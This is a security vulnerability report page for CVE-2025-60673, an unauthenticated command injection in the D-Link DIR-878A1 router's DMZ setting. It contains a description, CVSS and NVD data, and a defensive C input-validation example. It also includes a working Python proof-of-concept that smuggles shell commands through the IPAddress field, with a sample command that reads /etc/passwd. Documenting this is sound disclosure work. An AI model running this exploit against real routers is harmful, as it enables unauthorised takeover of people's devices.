Security Vulnerability Report
CVE-2025-60673 CVSS 6.5 MEDIUM

CVE-2025-60673

Published: 2025-11-13 19:15:48
Last Modified: 2025-11-17 19:03:54

Description

An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDMZSettings' functionality, where the 'IPAddress' parameter in prog.cgi is stored in NVRAM and later used by librcm.so to construct iptables commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device.
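The defensive counterpart to the flaw described above, as an added example (not D-Link's code and not from the original page): the stored value is accepted only if it is a canonical dotted-quad IPv4 address, and the command is built as an argv array for an exec-style call instead of a shell string. The function names and the iptables rule shown are assumptions made for illustration; the same check belongs both where the value is written to NVRAM and where it is read back.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Return 1 only if s is a canonical dotted-quad IPv4 address and nothing else. */
int is_strict_ipv4(const char *s)
{
    struct in_addr addr;
    char canon[INET_ADDRSTRLEN];

    if (s == NULL || strlen(s) >= INET_ADDRSTRLEN)
        return 0;
    if (inet_pton(AF_INET, s, &addr) != 1)      /* rejects ';', spaces, '$', ... */
        return 0;
    if (inet_ntop(AF_INET, &addr, canon, sizeof canon) == NULL)
        return 0;
    return strcmp(s, canon) == 0;               /* round-trip must match exactly */
}

/*
 * Hypothetical helper: fill argv for execv()-style invocation (no shell).
 * The rule is a constructed illustration, not the firmware's actual rule.
 * Returns the argument count on success, -1 if the value is rejected.
 */
int build_dmz_argv(const char *nvram_ip, const char *argv[], size_t argv_len)
{
    static const char *const rule[] = {
        "iptables", "-t", "nat", "-A", "PREROUTING",
        "-j", "DNAT", "--to-destination"
    };
    size_t n = sizeof rule / sizeof rule[0];

    if (argv_len < n + 2 || !is_strict_ipv4(nvram_ip))
        return -1;
    for (size_t i = 0; i < n; i++)
        argv[i] = rule[i];
    argv[n] = nvram_ip;     /* a single argv element, never parsed by a shell */
    argv[n + 1] = NULL;
    return (int)n + 1;
}

int main(void)
{
    /* Constructed sample values as they might be read back from NVRAM. */
    const char *samples[] = { "192.168.0.100", "192.168.0.100;id #", "192.168.000.1" };
    const char *argv[10];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s -> %s\n", samples[i],
               build_dmz_argv(samples[i], argv, 10) > 0 ? "accepted" : "rejected");
    return 0;
}
```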

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-878A1 firmware version FW101B04.bin

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-60673 PoC - D-Link DIR-878A1 SetDMZSettings Command Injection
This PoC demonstrates unauthenticated command injection in D-Link DIR-878A1 router.
"""
import requests
import sys


def exploit(target_ip, injected_command="echo vulnerable > /tmp/pwned"):
    """
    Exploit the SetDMZSettings command injection vulnerability.

    Args:
        target_ip: IP address of the vulnerable D-Link router
        injected_command: Command to execute on the target device
    """
    # Target URL for the vulnerable prog.cgi endpoint
    url = f"http://{target_ip}/prog.cgi"

    # The malicious payload exploits the IPAddress parameter
    # We inject a command by adding shell metacharacters after the IP address
    # The format typically requires a valid-looking IP prefix followed by command injection
    payload = {
        "SetDMZSettings": "1",
        "IPAddress": f"127.0.0.1;{injected_command} #",
        "enable": "1"
    }

    print(f"[*] Target: {target_ip}")
    print(f"[*] Sending malicious request...")
    print(f"[*] Payload: {payload}")

    try:
        # Send POST request without authentication
        response = requests.post(url, data=payload, timeout=10)
        print(f"[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        if response.status_code == 200:
            print("[+] Exploit likely successful - check if command was executed")
        else:
            print("[-] Unexpected response")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    return True


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [command]")
        print(f"Example: {sys.argv[0]} 192.168.0.1 'cat /etc/passwd'")
        sys.exit(1)
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else "echo PWNED"
    exploit(target, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60673", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:48.167", "lastModified": "2025-11-17T19:03:53.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDMZSettings' functionality, where the 'IPAddress' parameter in prog.cgi is stored in NVRAM and later used by librcm.so to construct iptables commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:*", "matchCriteriaId": "CF6C5938-ACC7-4DD4-B3EF-AD64468AD60F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:*", "matchCriteriaId": "70A35F2E-E46F-47CF-BF0F-9CF9A3242EDC"}]}]}], "references": [{"url": "http://d-link.com", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-878/CVE-2025-60673.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}